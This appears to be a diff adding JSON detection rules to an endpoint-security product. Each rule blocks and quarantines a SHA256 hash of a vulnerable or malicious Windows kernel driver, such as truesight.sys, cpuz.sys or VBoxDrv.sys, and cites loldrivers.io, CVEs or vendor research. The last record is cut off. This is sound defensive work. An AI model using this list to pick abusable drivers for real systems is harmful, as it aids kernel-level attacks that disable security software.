+ "id": "e7363871-e97b-5793-b2aa-fa4e46e6cdee",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983920Z",
+ "creation_date": "2026-03-23T11:45:29.983922Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983928Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "46ffe559f5a8f6bd611ac5a9264edf92d8449d8d31b2ddf6b2add5971e309c56",
+ "comment": "Vulnerable Kernel Driver (aka iomem64.sys) [https://www.loldrivers.io/drivers/04d377f9-36e0-42a4-8d47-62232163dc68/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e736570e-0dd2-529b-8304-cd93ce375a2e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828860Z",
+ "creation_date": "2026-03-23T11:45:30.828862Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828868Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f5964b0bb4036485e8424006a47f68e1a6a5b65fbcb6a9381b2915dbc54bd4d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e73ba48e-a6c4-50d7-8926-dff9d4d933ab",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140856Z",
+ "creation_date": "2026-03-23T11:45:31.140858Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140864Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7dbb58bc5a88defdbb20983a858b122df1c92f3a1be88879e00268db37d380cc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e757c61d-9f0a-5a31-9d47-eb773cdd095b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984407Z",
+ "creation_date": "2026-03-23T11:45:29.984409Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984414Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "cfab93885e5129a86d13fd380d010cc8c204429973b776ab1b472d84a767930f",
+ "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e75b4f39-1641-5bfd-8c66-d30636c9c636",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488828Z",
+ "creation_date": "2026-03-23T11:45:31.488830Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488835Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "17d87146257a05e71e2b0c14c753a7a23b24f580684c20744328ee2c17c4a5d4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e7633e6d-d04a-5168-bd96-055676fff9e6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.489993Z",
+ "creation_date": "2026-03-23T11:45:31.489997Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490006Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "66389eeb0403a8b8a5e9c86d55015270091a8ce564f7a96daa49e422a5bf12ad",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e766c713-9b84-53c3-a628-0a84a267b9c2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474987Z",
+ "creation_date": "2026-03-23T11:45:30.474991Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475000Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "31fcf4cbe7de8a5d563144e577324f9206bcc24ddf17473b436f1c693dff0ee7",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e76c5e47-70cc-5135-a90c-61db39f43c05",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610492Z",
+ "creation_date": "2026-03-23T11:45:29.610494Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610499Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "60b163776e7b95e0c2280d04476304d0c943b484909131f340e3ce6045a49289",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e783780f-0df8-5d9e-8e38-06e077343de8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832003Z",
+ "creation_date": "2026-03-23T11:45:30.832005Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832011Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6a4c86dc9c64509ec1fd2cbbc9ab3796d9e22987e08be41a82f9171b88a85c01",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e78f66d7-b61e-5b12-8b1c-66e3a6bd661c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608562Z",
+ "creation_date": "2026-03-23T11:45:29.608564Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608569Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "597e7d5feb149d9087888926d1454dc06f1078ab18c948b44f090910da8645f8",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e7916315-04a3-578c-a611-3e9f4b561540",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488152Z",
+ "creation_date": "2026-03-23T11:45:31.488154Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488159Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4157456f9f9b17f3cec65c7b4c0132a9607b95d84b7c91a78531f498b83c7bc5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e79954df-3256-514f-a4b9-f4170bc6e53b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.480236Z",
+ "creation_date": "2026-03-23T11:45:31.480240Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.480250Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "59234802fe72df8ee65caa625efdbe3cfaeb53d1c9872dc2235947ba03f6a027",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e79e1b11-dccd-5bc9-88b9-ec626201d53a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145262Z",
+ "creation_date": "2026-03-23T11:45:32.145266Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145275Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "77225a99b2e0e2b4007fb2f5a96d356e13deab45b9ef54c175d5452de8a211a7",
+ "comment": "Malicious Kernel Driver (aka driver_77225a99.sys) [https://www.loldrivers.io/drivers/5fb86651-c152-404a-9a2f-0f54b0d2bb55/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e7a5bc55-8cdb-5f1f-9211-3e55da1877b1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826532Z",
+ "creation_date": "2026-03-23T11:45:30.826534Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826539Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "562d931e327967192b2c614968ee90b4e0e1f226c152800d2f6df4e602147203",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e7a98455-6ffb-50cd-9711-71ce7e73ceae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151264Z",
+ "creation_date": "2026-03-23T11:45:31.151266Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151271Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89138b34b0e057db07d7c6e56992aca0f30faafcce9fe511dcab7d14f3f41279",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e7b10f8f-9b89-5f48-a473-d74180df6515",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824904Z",
+ "creation_date": "2026-03-23T11:45:31.824908Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824917Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4ab0442d9b69f0087e4acb3bda60422061c41ded7cf5e197a2bedefc98655993",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e7b85012-0bfe-535d-a54b-254e5e16365c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477643Z",
+ "creation_date": "2026-03-23T11:45:31.477647Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477657Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f22701e787985e0335480e616a36bd33d7df96272a2afa1b812430cfc449a53f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e7cff119-2db4-5ec5-8dae-dd42dcdf982d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820160Z",
+ "creation_date": "2026-03-23T11:45:30.820162Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820167Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f72dbb2a818ba47ca03ffbe50d211050210699c25caec3b97ca960d7286d4b6a",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e7d01e33-9469-5460-bbfb-8420062115aa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972560Z",
+ "creation_date": "2026-03-23T11:45:29.972562Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972568Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2b4c7d3820fe08400a7791e2556132b902a9bbadc1942de57077ecb9d21bf47a",
+ "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e7d1fbe6-7be0-5f90-8f3f-c904fc97f431",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475702Z",
+ "creation_date": "2026-03-23T11:45:30.475705Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475714Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "89698cad598a56f9e45efffd15d1841e494a2409cc12279150a03842cd6bb7f3",
+ "comment": "Malicious Kernel Driver (aka wfshbr64.sys) [https://www.loldrivers.io/drivers/ddf661c0-7dfc-4c26-89c5-00cd6a81a139/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e7dce429-7080-5bc4-b6fb-d9a90041bb39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.476598Z",
+ "creation_date": "2026-03-23T11:45:31.476601Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.476611Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0cc0132730115b65bfda0adb4de8a1a1c035b1d0eb2384873cf3a5c3cb2efb14",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e7e2f8c9-b0df-5860-9bf4-4ff8f8730a71",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.477055Z",
+ "creation_date": "2026-03-23T11:45:30.477058Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.477067Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e0e65416f40cf3bea00d77515a7d8ab508d3aa2b7b622a8799a49635c4d5dbb5",
+ "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e7ea15a4-f24f-50bb-b25b-5d64d2e1f9e9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
